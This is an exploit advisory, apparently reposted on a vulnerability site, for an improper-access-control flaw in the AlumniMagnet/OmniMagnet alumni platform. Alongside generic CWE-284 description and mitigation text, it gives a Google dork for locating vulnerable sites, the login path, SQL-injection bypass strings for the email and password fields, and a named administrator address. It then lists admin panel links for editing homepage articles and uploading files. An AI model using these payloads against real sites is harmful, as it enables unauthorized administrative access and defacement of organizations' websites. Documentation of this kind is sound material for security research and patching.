AlumniMagnet OmniMagnet Improper Access Control Vulnerability

2019.05.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-284

#################################################################### # Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 18/05/2019 # Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org # Vulnerability Type : CWE-284 [ Improper Access Control ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** The top alumni associations in the world use AlumniMagnet as their alumni engagement and volunteer management platform. Made for large universities and colleges, schools and their chapters. Enterprise Edition involves all of the Central features, but also brings in connectivity between the university's alumni office and all of its associated chapters, classes, and clubs. #################################################################### # Impact : *********** The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. There are two distinct behaviors that can introduce access control weaknesses: Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator. Performing of activities carried out only by administrator or program became available for all the users. Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies. Potential Mitigations Phases: Architecture and Design; Operation Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. Phase: Architecture and Design Strategy: Separation of Privilege Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design and that the compartmentalization serves to allow for and further reinforce privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide when it is appropriate to use and to drop system privileges. #################################################################### # Improper Access Control Exploit : ******************************** Non-Alumni Staff Administrator Page Login Path : ******************************************* /user.html?op=login&non_alum=true Faculty, Staff, Parents, and Non-Alumni Members and Guests – click here and login below. Administrator E-Mail Address : **************************** ops@omnimagnet.com 'or''='@gmail.com 'or''='@yahoo.com 'or''='@hotmail.com Administrator Password : *********************** 'or''=' ' or 1=1 limit 1 -- -+ anything' OR 'x'='x Useable Admin Control Panel Links : ******************************** We can change the articles on the homepage without administrator permission. /admin_article.html /article.html?aid=[ID-NUMBER] /admin_article.html?op=edit&aid=[ID-NUMBER] /admin_files.html /admin_files.html?sub_op=upload_files Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12 Upload a File. Click Manage Uploads. At the bottom of the page you can see the link showing where the image is going. /images/vault/[ID-NUMBER].jpg Look at File Destination => 'file_dest' => 'images/vault/[ID-NUMBER].jpg', array ( 'captcha' => array ( 0 => '[RANDOM-ID-NUMBER]', ), 'current_user' => '1', 'current_user_first_name' => 'Magnet', 'current_user_aux_id' => '', 'current_user_permissions' => '[RANDOM-ID-NUMBER]', 'current_user_email' => 'ops@omnimagnet.com', 'current_user_nickname' => 'Magnet Team', 'signed_in_at' => '[DOMAIN-ADDRESS-HERE]', 'main_code' => NULL, 'last_update_date' => '[RANDOM-ID-NUMBER]', 'current_user_authenticated' => 'y', 'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files', 'file_dest' => 'images/vault/[ID-NUMBER].jpg', Sometimes it gives error like this - Then you cannot have an admin account. ************************************ Access denied... The page you requested requires staff clearance. Make sure you are logged into the system before you proceed. If you feel that this is an error, please contact an admin. Authentication Error Error code 201 The email/password combination you have entered does not match. Please check your records and try again. #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top